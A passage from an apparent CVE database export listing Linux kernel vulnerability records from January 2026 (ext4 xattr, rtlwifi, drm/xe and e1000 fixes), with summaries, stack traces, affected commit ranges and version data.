"title": "net: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71079",
"datePublished": "2026-01-13T15:34:44.136Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-01-19T12:19:41.379Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68820 (GCVE-0-2025-68820)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
ext4: xattr: fix null pointer deref in ext4_raw_inode()
Summary
In the Linux kernel, the following vulnerability has been resolved:
ext4: xattr: fix null pointer deref in ext4_raw_inode()
If ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED),
iloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all()
lacks error checking, this will lead to a null pointer dereference
in ext4_raw_inode(), called right after ext4_get_inode_loc().
Found by Linux Verification Center (linuxtesting.org) with SVACE.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
76c365fa7e2a8bb85f0190cdb4b8cdc99b2fdce3 , < b72a3476f0c97d02f63a6e9fff127348d55436f6
(git)
Affected: f737418b6de31c962c7192777ee4018906975383 , < 3d8d22e75f7edfa0b30ff27330fd6a1285d594c3 (git) Affected: cf9291a3449b04688b81e32621e88de8f4314b54 , < 190ad0f22ba49f1101182b80e3af50ca2ddfe72f (git) Affected: 362a90cecd36e8a5c415966d0b75b04a0270e4dd , < b5d942922182e82724b7152cb998f540132885ec (git) Affected: eb59cc31b6ea076021d14b04e7faab1636b87d0e , < 5b154e901fda2e98570b8f426a481f5740097dc2 (git) Affected: c8e008b60492cf6fd31ef127aea6d02fd3d314cd , < ce5f54c065a4a7cbb92787f4f140917112350142 (git) Affected: c8e008b60492cf6fd31ef127aea6d02fd3d314cd , < b97cb7d6a051aa6ebd57906df0e26e9e36c26d14 (git) Affected: 6aff941cb0f7d0c897c3698ad2e30672709135e3 (git) Affected: 3bc6317033f365ce578eb6039445fb66162722fd (git) Affected: 836e625b03a666cf93ff5be328c8cb30336db872 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ext4/xattr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b72a3476f0c97d02f63a6e9fff127348d55436f6",
"status": "affected",
"version": "76c365fa7e2a8bb85f0190cdb4b8cdc99b2fdce3",
"versionType": "git"
},
{
"lessThan": "3d8d22e75f7edfa0b30ff27330fd6a1285d594c3",
"status": "affected",
"version": "f737418b6de31c962c7192777ee4018906975383",
"versionType": "git"
},
{
"lessThan": "190ad0f22ba49f1101182b80e3af50ca2ddfe72f",
"status": "affected",
"version": "cf9291a3449b04688b81e32621e88de8f4314b54",
"versionType": "git"
},
{
"lessThan": "b5d942922182e82724b7152cb998f540132885ec",
"status": "affected",
"version": "362a90cecd36e8a5c415966d0b75b04a0270e4dd",
"versionType": "git"
},
{
"lessThan": "5b154e901fda2e98570b8f426a481f5740097dc2",
"status": "affected",
"version": "eb59cc31b6ea076021d14b04e7faab1636b87d0e",
"versionType": "git"
},
{
"lessThan": "ce5f54c065a4a7cbb92787f4f140917112350142",
"status": "affected",
"version": "c8e008b60492cf6fd31ef127aea6d02fd3d314cd",
"versionType": "git"
},
{
"lessThan": "b97cb7d6a051aa6ebd57906df0e26e9e36c26d14",
"status": "affected",
"version": "c8e008b60492cf6fd31ef127aea6d02fd3d314cd",
"versionType": "git"
},
{
"status": "affected",
"version": "6aff941cb0f7d0c897c3698ad2e30672709135e3",
"versionType": "git"
},
{
"status": "affected",
"version": "3bc6317033f365ce578eb6039445fb66162722fd",
"versionType": "git"
},
{
"status": "affected",
"version": "836e625b03a666cf93ff5be328c8cb30336db872",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ext4/xattr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.15"
},
{
"lessThan": "6.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.237",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15.181",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.135",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.6.88",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.12.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.293",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.13.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.14.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: xattr: fix null pointer deref in ext4_raw_inode()\n\nIf ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED),\niloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all()\nlacks error checking, this will lead to a null pointer dereference\nin ext4_raw_inode(), called right after ext4_get_inode_loc().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:25.087Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b72a3476f0c97d02f63a6e9fff127348d55436f6"
},
{
"url": "https://git.kernel.org/stable/c/3d8d22e75f7edfa0b30ff27330fd6a1285d594c3"
},
{
"url": "https://git.kernel.org/stable/c/190ad0f22ba49f1101182b80e3af50ca2ddfe72f"
},
{
"url": "https://git.kernel.org/stable/c/b5d942922182e82724b7152cb998f540132885ec"
},
{
"url": "https://git.kernel.org/stable/c/5b154e901fda2e98570b8f426a481f5740097dc2"
},
{
"url": "https://git.kernel.org/stable/c/ce5f54c065a4a7cbb92787f4f140917112350142"
},
{
"url": "https://git.kernel.org/stable/c/b97cb7d6a051aa6ebd57906df0e26e9e36c26d14"
}
],
"title": "ext4: xattr: fix null pointer deref in ext4_raw_inode()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68820",
"datePublished": "2026-01-13T15:29:23.351Z",
"dateReserved": "2025-12-24T10:30:51.048Z",
"dateUpdated": "2026-01-19T12:19:25.087Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71100 (GCVE-0-2025-71100)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
VLAI?
EPSS
Title
wifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()
TID getting from ieee80211_get_tid() might be out of range of array size
of sta_entry->tids[], so check TID is less than MAX_TID_COUNT. Othwerwise,
UBSAN warn:
UBSAN: array-index-out-of-bounds in drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c:514:30
index 10 is out of range for type 'rtl_tid_data [9]'
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
8ca4cdef93297c9b9bf08da39bc940bd20acbb94 , < 9765d6eb8298b07d499cdf9ef7c237d3540102d6
(git)
Affected: 8ca4cdef93297c9b9bf08da39bc940bd20acbb94 , < 90a15ff324645aa806d81fa349497cd964861b66 (git) Affected: 8ca4cdef93297c9b9bf08da39bc940bd20acbb94 , < dd39edb445f07400e748da967a07d5dca5c5f96e (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9765d6eb8298b07d499cdf9ef7c237d3540102d6",
"status": "affected",
"version": "8ca4cdef93297c9b9bf08da39bc940bd20acbb94",
"versionType": "git"
},
{
"lessThan": "90a15ff324645aa806d81fa349497cd964861b66",
"status": "affected",
"version": "8ca4cdef93297c9b9bf08da39bc940bd20acbb94",
"versionType": "git"
},
{
"lessThan": "dd39edb445f07400e748da967a07d5dca5c5f96e",
"status": "affected",
"version": "8ca4cdef93297c9b9bf08da39bc940bd20acbb94",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.9"
},
{
"lessThan": "6.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()\n\nTID getting from ieee80211_get_tid() might be out of range of array size\nof sta_entry-\u003etids[], so check TID is less than MAX_TID_COUNT. Othwerwise,\nUBSAN warn:\n\n UBSAN: array-index-out-of-bounds in drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c:514:30\n index 10 is out of range for type \u0027rtl_tid_data [9]\u0027"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:59.039Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9765d6eb8298b07d499cdf9ef7c237d3540102d6"
},
{
"url": "https://git.kernel.org/stable/c/90a15ff324645aa806d81fa349497cd964861b66"
},
{
"url": "https://git.kernel.org/stable/c/dd39edb445f07400e748da967a07d5dca5c5f96e"
}
],
"title": "wifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71100",
"datePublished": "2026-01-13T15:34:59.039Z",
"dateReserved": "2026-01-13T15:30:19.651Z",
"dateUpdated": "2026-01-13T15:34:59.039Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68802 (GCVE-0-2025-68802)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
VLAI?
EPSS
Title
drm/xe: Limit num_syncs to prevent oversized allocations
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/xe: Limit num_syncs to prevent oversized allocations
The exec and vm_bind ioctl allow userspace to specify an arbitrary
num_syncs value. Without bounds checking, a very large num_syncs
can force an excessively large allocation, leading to kernel warnings
from the page allocator as below.
Introduce DRM_XE_MAX_SYNCS (set to 1024) and reject any request
exceeding this limit.
"
------------[ cut here ]------------
WARNING: CPU: 0 PID: 1217 at mm/page_alloc.c:5124 __alloc_frozen_pages_noprof+0x2f8/0x2180 mm/page_alloc.c:5124
...
Call Trace:
<TASK>
alloc_pages_mpol+0xe4/0x330 mm/mempolicy.c:2416
___kmalloc_large_node+0xd8/0x110 mm/slub.c:4317
__kmalloc_large_node_noprof+0x18/0xe0 mm/slub.c:4348
__do_kmalloc_node mm/slub.c:4364 [inline]
__kmalloc_noprof+0x3d4/0x4b0 mm/slub.c:4388
kmalloc_noprof include/linux/slab.h:909 [inline]
kmalloc_array_noprof include/linux/slab.h:948 [inline]
xe_exec_ioctl+0xa47/0x1e70 drivers/gpu/drm/xe/xe_exec.c:158
drm_ioctl_kernel+0x1f1/0x3e0 drivers/gpu/drm/drm_ioctl.c:797
drm_ioctl+0x5e7/0xc50 drivers/gpu/drm/drm_ioctl.c:894
xe_drm_ioctl+0x10b/0x170 drivers/gpu/drm/xe/xe_device.c:224
vfs_ioctl fs/ioctl.c:51 [inline]
__do_sys_ioctl fs/ioctl.c:598 [inline]
__se_sys_ioctl fs/ioctl.c:584 [inline]
__x64_sys_ioctl+0x18b/0x210 fs/ioctl.c:584
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xbb/0x380 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
...
"
v2: Add "Reported-by" and Cc stable kernels.
v3: Change XE_MAX_SYNCS from 64 to 1024. (Matt & Ashutosh)
v4: s/XE_MAX_SYNCS/DRM_XE_MAX_SYNCS/ (Matt)
v5: Do the check at the top of the exec func. (Matt)
(cherry picked from commit b07bac9bd708ec468cd1b8a5fe70ae2ac9b0a11c)
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
dd08ebf6c3525a7ea2186e636df064ea47281987 , < e281d1fd6903a081ef023c341145ae92258e38d2
(git)
Affected: dd08ebf6c3525a7ea2186e636df064ea47281987 , < 1d200017f55f829b9e376093bd31dfbec92081de (git) Affected: dd08ebf6c3525a7ea2186e636df064ea47281987 , < 8e461304009135270e9ccf2d7e2dfe29daec9b60 (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/xe/xe_exec.c",
"drivers/gpu/drm/xe/xe_vm.c",
"include/uapi/drm/xe_drm.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e281d1fd6903a081ef023c341145ae92258e38d2",
"status": "affected",
"version": "dd08ebf6c3525a7ea2186e636df064ea47281987",
"versionType": "git"
},
{
"lessThan": "1d200017f55f829b9e376093bd31dfbec92081de",
"status": "affected",
"version": "dd08ebf6c3525a7ea2186e636df064ea47281987",
"versionType": "git"
},
{
"lessThan": "8e461304009135270e9ccf2d7e2dfe29daec9b60",
"status": "affected",
"version": "dd08ebf6c3525a7ea2186e636df064ea47281987",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/xe/xe_exec.c",
"drivers/gpu/drm/xe/xe_vm.c",
"include/uapi/drm/xe_drm.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.8"
},
{
"lessThan": "6.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe: Limit num_syncs to prevent oversized allocations\n\nThe exec and vm_bind ioctl allow userspace to specify an arbitrary\nnum_syncs value. Without bounds checking, a very large num_syncs\ncan force an excessively large allocation, leading to kernel warnings\nfrom the page allocator as below.\n\nIntroduce DRM_XE_MAX_SYNCS (set to 1024) and reject any request\nexceeding this limit.\n\n\"\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 1217 at mm/page_alloc.c:5124 __alloc_frozen_pages_noprof+0x2f8/0x2180 mm/page_alloc.c:5124\n...\nCall Trace:\n \u003cTASK\u003e\n alloc_pages_mpol+0xe4/0x330 mm/mempolicy.c:2416\n ___kmalloc_large_node+0xd8/0x110 mm/slub.c:4317\n __kmalloc_large_node_noprof+0x18/0xe0 mm/slub.c:4348\n __do_kmalloc_node mm/slub.c:4364 [inline]\n __kmalloc_noprof+0x3d4/0x4b0 mm/slub.c:4388\n kmalloc_noprof include/linux/slab.h:909 [inline]\n kmalloc_array_noprof include/linux/slab.h:948 [inline]\n xe_exec_ioctl+0xa47/0x1e70 drivers/gpu/drm/xe/xe_exec.c:158\n drm_ioctl_kernel+0x1f1/0x3e0 drivers/gpu/drm/drm_ioctl.c:797\n drm_ioctl+0x5e7/0xc50 drivers/gpu/drm/drm_ioctl.c:894\n xe_drm_ioctl+0x10b/0x170 drivers/gpu/drm/xe/xe_device.c:224\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:598 [inline]\n __se_sys_ioctl fs/ioctl.c:584 [inline]\n __x64_sys_ioctl+0x18b/0x210 fs/ioctl.c:584\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xbb/0x380 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n...\n\"\n\nv2: Add \"Reported-by\" and Cc stable kernels.\nv3: Change XE_MAX_SYNCS from 64 to 1024. (Matt \u0026 Ashutosh)\nv4: s/XE_MAX_SYNCS/DRM_XE_MAX_SYNCS/ (Matt)\nv5: Do the check at the top of the exec func. (Matt)\n\n(cherry picked from commit b07bac9bd708ec468cd1b8a5fe70ae2ac9b0a11c)"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:11.079Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e281d1fd6903a081ef023c341145ae92258e38d2"
},
{
"url": "https://git.kernel.org/stable/c/1d200017f55f829b9e376093bd31dfbec92081de"
},
{
"url": "https://git.kernel.org/stable/c/8e461304009135270e9ccf2d7e2dfe29daec9b60"
}
],
"title": "drm/xe: Limit num_syncs to prevent oversized allocations",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68802",
"datePublished": "2026-01-13T15:29:11.079Z",
"dateReserved": "2025-12-24T10:30:51.045Z",
"dateUpdated": "2026-01-13T15:29:11.079Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71093 (GCVE-0-2025-71093)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
e1000: fix OOB in e1000_tbi_should_accept()
Summary
In the Linux kernel, the following vulnerability has been resolved:
e1000: fix OOB in e1000_tbi_should_accept()
In e1000_tbi_should_accept() we read the last byte of the frame via
'data[length - 1]' to evaluate the TBI workaround. If the descriptor-
reported length is zero or larger than the actual RX buffer size, this
read goes out of bounds and can hit unrelated slab objects. The issue
is observed from the NAPI receive path (e1000_clean_rx_irq):
==================================================================
BUG: KASAN: slab-out-of-bounds in e1000_tbi_should_accept+0x610/0x790
Read of size 1 at addr ffff888014114e54 by task sshd/363
CPU: 0 PID: 363 Comm: sshd Not tainted 5.18.0-rc1 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014
Call Trace:
<IRQ>
dump_stack_lvl+0x5a/0x74
print_address_description+0x7b/0x440
print_report+0x101/0x200
kasan_report+0xc1/0xf0
e1000_tbi_should_accept+0x610/0x790
e1000_clean_rx_irq+0xa8c/0x1110
e1000_clean+0xde2/0x3c10
__napi_poll+0x98/0x380
net_rx_action+0x491/0xa20
__do_softirq+0x2c9/0x61d
do_softirq+0xd1/0x120
</IRQ>
<TASK>
__local_bh_enable_ip+0xfe/0x130
ip_finish_output2+0x7d5/0xb00
__ip_queue_xmit+0xe24/0x1ab0
__tcp_transmit_skb+0x1bcb/0x3340
tcp_write_xmit+0x175d/0x6bd0
__tcp_push_pending_frames+0x7b/0x280
tcp_sendmsg_locked+0x2e4f/0x32d0
tcp_sendmsg+0x24/0x40
sock_write_iter+0x322/0x430
vfs_write+0x56c/0xa60
ksys_write+0xd1/0x190
do_syscall_64+0x43/0x90
entry_SYSCALL_64_after_hwframe+0x44/0xae
RIP: 0033:0x7f511b476b10
Code: 73 01 c3 48 8b 0d 88 d3 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d f9 2b 2c 00 00 75 10 b8 01 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 8e 9b 01 00 48 89 04 24
RSP: 002b:00007ffc9211d4e8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001
RAX: ffffffffffffffda RBX: 0000000000004024 RCX: 00007f511b476b10
RDX: 0000000000004024 RSI: 0000559a9385962c RDI: 0000000000000003
RBP: 0000559a9383a400 R08: fffffffffffffff0 R09: 0000000000004f00
R10: 0000000000000070 R11: 0000000000000246 R12: 0000000000000000
R13: 00007ffc9211d57f R14: 0000559a9347bde7 R15: 0000000000000003
</TASK>
Allocated by task 1:
__kasan_krealloc+0x131/0x1c0
krealloc+0x90/0xc0
add_sysfs_param+0xcb/0x8a0
kernel_add_sysfs_param+0x81/0xd4
param_sysfs_builtin+0x138/0x1a6
param_sysfs_init+0x57/0x5b
do_one_initcall+0x104/0x250
do_initcall_level+0x102/0x132
do_initcalls+0x46/0x74
kernel_init_freeable+0x28f/0x393
kernel_init+0x14/0x1a0
ret_from_fork+0x22/0x30
The buggy address belongs to the object at ffff888014114000
which belongs to the cache kmalloc-2k of size 2048
The buggy address is located 1620 bytes to the right of
2048-byte region [ffff888014114000, ffff888014114800]
The buggy address belongs to the physical page:
page:ffffea0000504400 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x14110
head:ffffea0000504400 order:3 compound_mapcount:0 compound_pincount:0
flags: 0x100000000010200(slab|head|node=0|zone=1)
raw: 0100000000010200 0000000000000000 dead000000000001 ffff888013442000
raw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected
==================================================================
This happens because the TBI check unconditionally dereferences the last
byte without validating the reported length first:
u8 last_byte = *(data + length - 1);
Fix by rejecting the frame early if the length is zero, or if it exceeds
adapter->rx_buffer_len. This preserves the TBI workaround semantics for
valid frames and prevents touching memory beyond the RX buffer.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
2037110c96d5f1dd71453fcd0d54e79be12a352b , < 4ccfa56f272241e8d8e2c38191fdbb03df489d80
(git)
Affected: 2037110c96d5f1dd71453fcd0d54e79be12a352b , < 278b7cfe0d4da7502c7fd679b15032f014c92892 (git) Affected: 2037110c96d5f1dd71453fcd0d54e79be12a352b , < ad7a2a45e2417ac54089926b520924f8f0d91aea (git) Affected: 2037110c96d5f1dd71453fcd0d54e79be12a352b , < 2c4c0c09f9648ba766d399917d420d03e7b3e1f8 (git) Affected: 2037110c96d5f1dd71453fcd0d54e79be12a352b , < 26c8bebc2f25288c2bcac7bc0a7662279a0e817c (git) Affected: 2037110c96d5f1dd71453fcd0d54e79be12a352b , < ee7c125fb3e8b04dd46510130b9fc92380e5d578 (git) Affected: 2037110c96d5f1dd71453fcd0d54e79be12a352b , < 9c72a5182ed92904d01057f208c390a303f00a0f (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/e1000/e1000_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4ccfa56f272241e8d8e2c38191fdbb03df489d80",
"status": "affected",
"version": "2037110c96d5f1dd71453fcd0d54e79be12a352b",
"versionType": "git"
},
{
"lessThan": "278b7cfe0d4da7502c7fd679b15032f014c92892",
"status": "affected",
"version": "2037110c96d5f1dd71453fcd0d54e79be12a352b",
"versionType": "git"
},
{
"lessThan": "ad7a2a45e2417ac54089926b520924f8f0d91aea",
"status": "affected",
"version": "2037110c96d5f1dd71453fcd0d54e79be12a352b",
"versionType": "git"
},
{
"lessThan": "2c4c0c09f9648ba766d399917d420d03e7b3e1f8",
"status": "affected",
"version": "2037110c96d5f1dd71453fcd0d54e79be12a352b",
"versionType": "git"
},
{
"lessThan": "26c8bebc2f25288c2bcac7bc0a7662279a0e817c",
"status": "affected",
"version": "2037110c96d5f1dd71453fcd0d54e79be12a352b",
"versionType": "git"
},
{
"lessThan": "ee7c125fb3e8b04dd46510130b9fc92380e5d578",
"status": "affected",
"version": "2037110c96d5f1dd71453fcd0d54e79be12a352b",
"versionType": "git"
},
{
"lessThan": "9c72a5182ed92904d01057f208c390a303f00a0f",
"status": "affected",
"version": "2037110c96d5f1dd71453fcd0d54e79be12a352b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/e1000/e1000_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.18"
},
{
"lessThan": "3.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
